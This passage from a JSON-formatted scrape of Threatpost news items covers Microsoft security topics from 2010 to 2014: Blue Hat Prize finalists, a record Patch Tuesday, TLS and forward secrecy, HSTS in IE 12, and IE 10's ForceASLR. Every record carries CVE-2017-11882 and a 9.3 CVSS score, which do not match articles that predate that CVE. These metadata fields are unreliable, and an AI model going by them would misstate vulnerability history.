All three will fly to Las Vegas on Microsoft\u2019s dime for the announcement.\n", "cvss3": {}, "published": "2012-06-21T15:41:28", "type": "threatpost", "title": "Microsoft Reveals Blue Hat Prize Finalists", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:59", "id": "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "href": "https://threatpost.com/microsoft-reveals-blue-hat-prize-finalists-062112/76722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:50", "description": "[](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>)This month\u2019s batch of security patches from Microsoft will be a record-breaking one: 16 bulletins addressing a whopping 49 security vulnerabilities. \n\nAccording to the company\u2019s advance notice, four of the 16 bulletins will be rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Microsoft rates a critical vulnerability as one that could be exploited to propagate an Internet worm without user action. \n\nThe 49 vulnerabilities will mark the largest ever batch of patches issued by Microsoft. 
The previous record was 34 vulnerabilities patched in August this year.\n\nThe October patch batch will include fixes for security flaws in the Windows operating system, the Internet Explorer browser, Microsoft Office and the .NET Framework.\n\nIt is very likely that Microsoft will include patches for a pair of elevation-of-privilege vulnerabilities that were exploited during the mysterious Stuxnet worm attack.\n\nThe flaws in this month’s release affect all versions of Windows, including the newest Windows 7 and Windows Server 2008.\n", "cvss3": {}, "published": "2010-10-07T18:43:29", "type": "threatpost", "title": "Microsoft Plans Record-Breaking Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:21:27", "id": "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "href": "https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/74560/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:35", "description": "Microsoft is no exception when it comes to [large technology providers committing to encrypting](<http://threatpost.com/yahoo-encrypts-data-center-links-boosts-other-services/105228>) the services its users depend on.\n\nToday, the company [announced](<http://blogs.technet.com/b/microsoft_on_the_issues/archive/2014/06/30/advancing-our-encryption-and-transparency-efforts.aspx>) an update on the progress it has made in engineering those changes, including the news that Outlook.com, its web-based email service, supports TLS encryption inbound and outbound as well as Perfect Forward Secrecy.\n\n“Our goal is to provide even greater protection for data across all the great Microsoft services you use and depend on every day,” said Matt Thomlinson, vice president of Trustworthy Computing.
“This effort also helps us reinforce that governments use appropriate legal processes, not technical brute force, if they want access to that data.”\n\nMicrosoft also announced that its OneDrive cloud-based storage service has enabled Perfect Forward Secrecy. The technique protects data by using a fresh, randomly generated key for each encrypted session; if one session key is compromised, it cannot be used to decrypt other sessions at a future time.\n\nIn the year-plus since the Snowden revelations began and [technology companies were questioned about the level of their complicity](<http://threatpost.com/tech-giants-update-transparency-reports-with-fisa-request-numbers/104056>) with government surveillance, firms such as Microsoft, Google, Facebook and Yahoo have taken public stands about the security of their services.\n\nDevelopers are being encouraged to use encryption and security technologies such as HTTPS, HSTS and PFS as default starting points in new applications. In December, Microsoft said it would have encryption protecting its services by the end of this year, including supporting HSTS on its public-facing services that exchange data, including email and credentials. Microsoft said it would also roll out STARTTLS for Outlook.com.\n\nHSTS, or [HTTPS Strict Transport Protocol](<http://threatpost.com/ie-12-to-support-hsts-encryption-protocol/105266>), forces sessions sent over HTTP to be sent instead over HTTPS. [STARTTLS](<http://threatpost.com/smtp-starttls-deployments-better-than-expected-facebook-says/106054>), meanwhile, allows clients and servers to encrypt messages provided both ends of a conversation support the protocol.\n\n[Microsoft’s December promise](<http://blogs.technet.com/b/microsoft_blog/archive/2013/12/04/protecting-customer-data-from-government-snooping.aspx?Redirected=true>), meanwhile, is coming to fruition.
It promised then that customer data moving between the user and Microsoft would be encrypted by default, and that data moving between data centers would be encrypted too. Microsoft has already moved to deprecate weak encryption keys, supporting only key lengths of 2048 bits or more.\n\nMicrosoft chose email as a starting point to concentrate its encryption efforts, bringing in worldwide partners such as Deutsche Telekom, Yandex and Mail.ru to test the viability of its encryption. The addition of Perfect Forward Secrecy to Outlook and OneDrive, for example, puts up another barrier not only for government intelligence agencies, but for criminal hackers as well.\n\n“Forward secrecy uses a different encryption key for every connection, making it more difficult for attackers to decrypt connections,” Thomlinson said, adding that OneDrive customers get PFS whether accessing the service online, through its mobile application or via a sync client. “As with Outlook.com’s email transfer, this makes it more difficult for attackers to decrypt connections between their systems and OneDrive.”\n\nMicrosoft also announced it has opened its first Microsoft Transparency Center. Located on the Redmond campus, the center gives participating governments a place to review source code for a number of products and certify the integrity of that source code. Other such centers are in the works, Thomlinson said, including one in Brussels, Belgium, announced in January.\n\n“As with most things relating to security, the landscape is ever changing,” he said.
“Our work is ongoing and we are continuing to advance on engineering and policy commitments with the goal of increasing protection for your data and increasing transparency in our processes.”\n", "cvss3": {}, "published": "2014-07-01T14:42:05", "type": "threatpost", "title": "Microsoft Expands TLS, Forward Secrecy Support", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-07-01T18:42:05", "id": "THREATPOST:F514D796FE42C0629BD951D8664A2420", "href": "https://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Microsoft confirmed today it will support HTTPS Strict Transport Protocol (HSTS) in Internet Explorer 12, bringing its browser in line with other major vendors in its support of the protocol.\n\nBrowsers supporting [HSTS](<https://tools.ietf.org/html/rfc6797>) force any sessions sent over HTTP to be sent instead over HTTPS, encrypting communication to and from a website.\n\nAccording to OWASP, HSTS protects users from a number of threats, in particular man-in-the-middle attacks, not only by forcing encrypted sessions but also by stopping attackers who use invalid digital certificates: the protocol denies users the ability to click through invalid-certificate warnings. HSTS also protects users from HTTPS websites that include HTTP links or serve some content unencrypted.\n\nIE 12 is expected to be released this year; IE 11 was introduced in October 2013 and is the default browser in Windows 8.1.\n\nIE 12’s support of HSTS puts it on an even keel with other browsers, some of which, such as Chrome and Firefox, have supported the protocol since 2011.
Apple added HSTS support to Safari with the release of Mavericks 10.9.\n\nAccording to the Electronic Frontier Foundation’s [Encrypt the Web](<https://www.eff.org/deeplinks/2013/11/encrypt-web-report-whos-doing-what>) report, a few leading technology companies already support HSTS on their websites, including Dropbox, Foursquare, SpiderOak and Twitter. Others, such as Facebook, LinkedIn, Tumblr and Yahoo, also plan to do so this year; Google plans to as well, for select domains.\n\nEFF staff technologist Jeremy Gillula said today that developers are either unaware of the [availability of HSTS](<https://www.eff.org/deeplinks/2014/02/websites-hsts>), or have been stymied by incomplete support in browsers.\n\n“This is changing though: we noticed that Apple quietly added HSTS support to Safari in OS X 10.9,” Gillula said. “For now, Internet Explorer doesn’t support HSTS—which means that there’s basically no such thing as a secure website in IE.”\n\nUntil that happens, much of the security burden falls on the user, who must either rely on a browser that supports HSTS or use something such as the HTTPS Everywhere browser extension.\n\n“For now all a savvy user can do is to always carefully examine the address of the site you’ve loaded, and verify that it’s secure by checking to make sure it has “https” in the front and is the precise address you want to visit,” Gillula said. “Unfortunately this assumes that you know ahead of time (and remember) whether or not a site should be secure, and are meticulous with every website you visit.”\n\nSecure protocols such as HTTPS, HSTS and Perfect Forward Secrecy have been given greater priority now that the depths of NSA and government surveillance have been exposed.
Experts urge developers to consider encryption technologies such as these a minimum standard for web-based services such as email.\n\nJust this week, Yahoo caught up to many of its contemporaries when it announced that it had [encrypted traffic moving between its data centers](<http://threatpost.com/yahoo-encrypts-data-center-links-boosts-other-services/105228>); Snowden documents revealed that the NSA and Britain’s GCHQ were able to tap into overseas fiber optic cables and copy data as it moved to the company’s data centers. Yahoo also announced its intention to support HSTS, Perfect Forward Secrecy and Certificate Transparency this year.\n", "cvss3": {}, "published": "2014-04-04T15:41:30", "type": "threatpost", "title": "IE 12 to Support HSTS Encryption Protocol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-09T18:05:31", "id": "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "href": "https://threatpost.com/ie-12-to-support-hsts-encryption-protocol/105266/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:32", "description": "Windows 8 is still off on the horizon somewhere, but the new version of Internet Explorer that’s coming with it, IE 10, is already in consumer preview, and it includes some major changes to the exploit mitigations. In addition to the existing implementations of ASLR, DEP and other technologies in Windows and IE, Microsoft has included a couple of new ones designed to further inhibit memory corruption attacks.\n\nThe biggest change in IE 10 is a technology called ForceASLR that’s meant to help compensate for the fact that not every application on Windows is compiled with the flag that opts it into ASLR.
One of the main exploit mitigations that Microsoft has added to Windows in recent years, ASLR (address space layout randomization), randomizes where modules are loaded in memory, turning them into moving targets for attackers and making it far more difficult for them to predict the addresses their payloads depend on. This has made browser-based exploits more complicated, but it only works if developers compile their applications with a specific linker flag, /DYNAMICBASE, set.\n\nThe new ForceASLR technology helps fix that shortcoming by allowing IE to tell Windows to load every module at a random location, regardless of whether it was compiled with the /DYNAMICBASE flag. Microsoft security officials say that this is among the more important additions the company has made to the security of its browser and Windows machines.\n\n“ForceASLR is arguably the most important change to ASLR in Windows 8. ForceASLR is a new loader option used by Internet Explorer 10 to instruct the operating system to randomize the location of _all_ modules loaded by the browser, even if a given module was not compiled with the /DYNAMICBASE flag. The ForceASLR protection was added to the Windows 8 kernel, and the feature is now available as an update to Windows 7 that will be installed when Internet Explorer 10 is installed on that platform,” [Forbes Higman](<http://blogs.msdn.com/b/ie/archive/2012/03/12/enhanced-memory-protections-in-ie10.aspx?Redirected=true>), a security program manager on IE, wrote in a blog post.\n\nIn addition to ForceASLR, Microsoft has included another mitigation called High Entropy ASLR that takes advantage of the larger address space that’s avai